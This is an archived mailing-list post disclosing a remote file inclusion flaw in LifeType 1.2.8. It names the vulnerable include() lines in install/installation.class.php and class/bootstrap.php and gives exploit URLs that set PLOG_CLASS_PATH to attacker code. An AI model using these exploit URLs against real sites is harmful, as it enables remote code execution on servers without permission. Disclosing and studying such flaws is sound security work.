[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

LifeType 1.2.8 Remote File Inclusion Vulnerability



Hi Dear,
I found a new bug in LifeType. Please publish it.
thank you
best regards
/===============================================================================================================================================\
  |																								  |
  |  [o] LifeType 1.2.8 Remote File Inclusion Vulnerability								     	  |
  |																								  |
  |       Software : LifeType 1.2.8
  |       Vendor   : http://lifetype.net/
  |       Author   : Cru3l.b0y													        		  |
  |       Contact  : Cru3l.b0y@xxxxxxxxxxxxxxxx								     				  |
  |		  Home     : WwW.DeltaHacking.Net 						
  |===============================================================================================================================================|
  |																								  |
  |  [o] Vulnerable file																		  |
  |																		  						  |
  |       install/installation.class.php								               	          |
  |																		  						  |
  |        include_once( PLOG_CLASS_PATH."config/config.properties.php" );                 	      |	
  |                                                                                               |
  |       class/bootstrap.php                                                                     |
  |                                                                                               |
  |		   include( PLOG_CLASS_PATH."class/object/loader.class.php" );                            |
  |		                                                                                          |
  |                                                                                               |
  |  [o] Exploit														  						  |
  |																		   						  |
  |       http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]       |
  |       http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]                  |
  |																		  						  |
  |===============================================================================================================================================|